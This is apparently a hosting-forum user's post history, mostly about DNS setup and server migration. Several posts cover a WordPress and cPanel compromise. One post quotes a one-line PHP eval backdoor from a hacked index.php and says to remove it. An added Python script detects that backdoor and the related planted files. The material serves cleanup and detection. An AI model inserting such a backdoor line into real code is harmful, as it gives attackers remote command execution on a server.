danval

Members
  • Posts

    22
Posts posted by danval

  1. Just checked another account and that one's also AnonymousFox'd...on two different WP installs.

     

    There's something in common with the WP installations here that's causing this. Either it's WP itself, or you're all using the same compromised plugin (which I doubt).

     

    Maybe a 0-day attack? I updated WordPress to 4.9.7 on 5th July.

  2. I'll have Krydos look at this one too.

     

    Thank you Wolstech.

     

    Have had their cPanel password changed by the hacker.

     

    This is the strangest thing. I can tell you that my password was very strong (mixed letters and numbers, and not a common word). So a reverse hash could be impossible.

     

    It would be interesting to determine if those affected are only those who have a Wordpress installed.

     

    I noticed the problem yesterday (Friday 20th at 14:53PM CEST) because Wordfence mailed me about an unexpected administrator login.

     

    Another account that was compromised was raqbul (belongs to a member of my family) at the same time.

  3. Wordpress is well known for severe security issues and is laughably easy to compromise

     

    Yes, this CMS is a headache. I had Wordpress up to date, and they still managed to attack it with success.

     

    If you don't have a backup, the best option is:

    1. Do a fresh install.
    2. Install the Wordfence plugin. It's free and can help you in these cases.
    3. Update regularly: plugins, themes and core.
    4. Do regular backups.

    This is the best option to fight against attacks, although they will continue to happen. And some of them with success :(

     

    Anyway, this is surely due to a hole in WordPress, but how have they managed to change the cPanel password? This is the most frustrating thing that I have found so far...

  4. In "index.php", remove this code at the start of the file:

    <?php eval($_POST['475454656']); ?>
    

    The "php.ini" must be deleted because it does not belong to WordPress.

     

    I think these are the only changes that were made, but the best solution is to restore a recent full backup of the site (files and database) if you have one.

     

    Also, this doesn't prevent the hack from happening again in the future, because it's necessary to know where the security hole is...

     


  5. Yes, the 'AnonymousFox' was the same administrator user rename as mine.

     

    I have installed Wordfence on my WordPress site. Thanks to the plugin I found out that a suspicious administrator login was made.

     

    I have done a scan from Wordfence, and I have the WordPress installation modified:

     

    New file: wp-admin/2125719357.php

    New file: wp-content/1205929475.php

    New file: wp-admin/php.ini

    Modified file: index.php
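
The indicators reported in the two posts above (an eval() of request input at the top of index.php, numeric-named PHP files, and a php.ini under wp-admin) can be checked with a short script. This is an added example, not part of the original posts or of Wordfence; the function names and the sample tree are constructed for illustration, and flagging php.ini only under the WordPress directories is an assumption.

```python
import os
import re
import tempfile

# Patterns derived from the indicators reported in the posts above.
EVAL_INPUT = re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I)
NUMERIC_PHP = re.compile(r"^\d+\.php$")
# Assumption: WordPress core ships no php.ini, so one under these directories is flagged.
WP_DIRS = ("wp-admin/", "wp-includes/", "wp-content/")

def scan_wordpress(root):
    """Return sorted (relative_path, reason) findings for a WordPress tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if NUMERIC_PHP.match(name):
                findings.append((rel, "numeric-named PHP file"))
            if name == "php.ini" and rel.startswith(WP_DIRS):
                findings.append((rel, "php.ini inside WordPress directory"))
            if name.endswith(".php"):
                try:
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
                if EVAL_INPUT.search(data):
                    findings.append((rel, "eval() on request input"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample install mirroring the files listed in the scan report."""
    samples = {
        "index.php": b"<?php eval($_POST['475454656']); ?>\n<?php require 'wp-blog-header.php';\n",
        "wp-admin/2125719357.php": b"<?php // constructed placeholder\n",
        "wp-content/1205929475.php": b"<?php // constructed placeholder\n",
        "wp-admin/php.ini": b"; constructed placeholder\n",
        "wp-admin/admin.php": b"<?php // clean core file stand-in\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)

def demo():
    """Build the constructed tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_wordpress(root)
```

A clean scan after removing these files does not show how the attacker got in, so restoring from a known-good backup remains the safer path.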

  6. Hi,

     

    The same thing started happening to me yesterday. I have a WordPress site on Tommy and I couldn't log in to either cPanel or WordPress administration.

     

    After resetting my password, I could log in to cPanel. I checked the WordPress database and I discovered that the admin user login was renamed and the password changed. These changes were not made by me, so I think the site has been hacked (and so my cPanel account).

     

    I thought this was only my problem, but a family member who has a WordPress blog on HelioHost too suffered the same problem. The WordPress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it.

     

    Seemingly the attack only affects the passwords, not files, and the database is in a good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good.

     

    Does anyone have the same problem?

     

    Best Regards,

  7. I use EU.ORG, and in the past, I had problems setting nameservers in this domain provider. Because of this I have an A record.

     

    As you say, I have changed the values of the NS record to ns1.heliohost.org and ns2.heliohost.org, and deleted the A record. Time to wait for replication.

     

    Thank you again for your invaluable help.

  8. Thank you Krydos!

     

    I have two questions:

    1. I've noticed that my forum username has changed to "danval2". Is it possible to rename it to "danval"?
    2. In the DNS configuration for my domain, I have an A record pointing to 216.218.192.170. I think this IP was Stevie a long time ago, although now it has another IP (65.19.143.2). Since this server is down, I changed the A record for my domain to point to Tommy (65.19.143.6). Is this correct?

    Best regards.

  9. Hello,

     

    Because of the current problems with Stevie, I must migrate my account to Tommy.

     

    I sent you a donation and received the invitation email to Tommy. But before I create an account in this server, an admin must delete my account on Stevie, right?

     

    This is my account info:

    • Username: danval
    • Domain: cerberolabs.es.eu.org
    • Server: stevie
    • Transaction ID: 0J528184E4869705K

    I'll transfer user, domain, email, database and files to this new account (I have a recent backup).

     

    On the other hand, at my home there is another person who also had a blog hosted on Stevie. This person doesn't have a PayPal account. If I make another donation, could you send the invitation to Tommy to a different email than the transaction (I'll specify it in the transaction message)?

     

    Thank you so much.

     

    Best regards.

     

  10. Hi,

     

    One person at my home would like to create a personal blog and I recommended this host server to her because I am very comfortable with the service.

     

    I have an account on HelioHost and I know about the account policy, but I don't know if accessing from the same computer/network will be detected as violating the terms of service with a duplicate account.

     

    Is there any problem with this situation? Can she create an account on HelioHost?

     

    I think I remember reading something long ago in the forum/faq/wiki about this situation, but I can't find it now.

  11. Hi,

     

    When I try to access my website I get a timeout error from the browser. I've been getting this error since two days ago (at least, since I know it).

     

    I have the same problems with FTP (216.218.192.170:21). However, I can log in to cPanel and access phpMyAdmin to back up the SQL database.

     

    Are there any known issues with stevie? Could you help me?

     

    My website is cerberolabs[dot]es[dot]eu[dot]org and my username is danval.

     

    Thanks,

  12. hussam, I've done the steps in your proposal, but it's still not working. Now I get the Account Queued page from HelioHost.

     

    I had created an account on another FreeDNS (EntryDNS) to register the domain at EU.org (it's mandatory to have authoritative nameservers).

     

    Now I created these records in this account:

     

    ***.es.eu.org (NS) -> ns1.entrydns.net
    ***.es.eu.org (NS) -> ns2.entrydns.net
    ***.es.eu.org (NS) -> ns3.entrydns.net
    ***.es.eu.org (A) -> 216.218.192.170

     

    Are they the same that you have?

     

    I will try a CloudFlare account also and I'll let you know if it works.

  13. Many thanks for the information wolstech.

     

    The last question: I submitted a new domain change to recover my old domain at heliohost (***.heliohost.org) using this script. Should I do anything else? The cPanel shows me the correct domain, but I can't access my site yet. Also NS1 answers 'not found' when queried about that domain. I guess that I must wait about 48 hours until it updates.

  14. Hi,

     

    I had created a domain under EU.org, and I would like to use it with my Heliohost account. To accomplish this, I followed the instructions on this topic: http://www.helionet....g-euorg-domain/ but with no success.

     

    Instead, I used the script to change my main domain on Heliohost (http://www.heliohost.../scripts/domain) to the EU.org domain. Apparently all was correct; I waited some time for the changes to be applied, and checked in cPanel that my domain was set correctly.

     

    However, when I set the nameservers on EU.org domain, I received the following errors:

     

    ---- Servers and domain names check
    Getting IP for NS1.HELIOHOST.ORG: 65.19.143.3
    Getting IP for NS2.HELIOHOST.ORG: 64.62.211.133
    ---- Checking SOA & NS records for ***.es.eu.org
    SOA from NS1.HELIOHOST.ORG at 65.19.143.3: serial 2014080501
    SOA from NS2.HELIOHOST.ORG at 64.62.211.133: Error: [Errno 32] Broken pipe
    NS from NS1.HELIOHOST.ORG at 65.19.143.3: ok
    NS from NS2.HELIOHOST.ORG at 64.62.211.133: Error: [Errno 32] Broken pipe
    2 errors(s)

     

    It seems that there is an error with nameserver ns2.heliohost.org.

     

    I tried to use nslookup, and DNS queries against this nameserver are not working:

     

    > server ns2.heliohost.org
    Servidor predeterminado:  ns2.heliohost.org
    Address:  64.62.211.133
    > heliohost.org
    Servidor:  ns2.heliohost.org
    Address:  64.62.211.133
    *** ns2.heliohost.org no encuentra heliohost.org: No response from server
    

     

    However with ns1.heliohost.org, it works:

     

    > server ns1.heliohost.org
    Servidor predeterminado:  ns1.heliohost.org
    Address:  65.19.143.3
    > heliohost.org
    Servidor:  ns1.heliohost.org
    Address:  65.19.143.3
    Nombre:  heliohost.org
    Address:  64.62.211.132

     

    Is there any problem with ns2.heliohost.org?

     

    ----------------------

    cPanel username: danval

    Domain: ***.heliohost.org (old) / ***.eu.es.org (new)

    Server: Steve

  15. Same here. I can't sign in to cPanel from HelioHost. It leads me to a new login screen (maybe Johnny's?). Reset password doesn't send any mail to my inbox.

     

    Also I have an IMAP client to read mail, but it shows a message "bad user/password" when trying to synchronize mails.

     

    I can access cPanel if I sign in from my subdomain with port 2082 (i.e. http://cerbero.heliohost.org:2082/).

     

    All of this has been happening to me since 4 hours ago.

     

    danval

    cerbero.heliohost.org

    Stevie
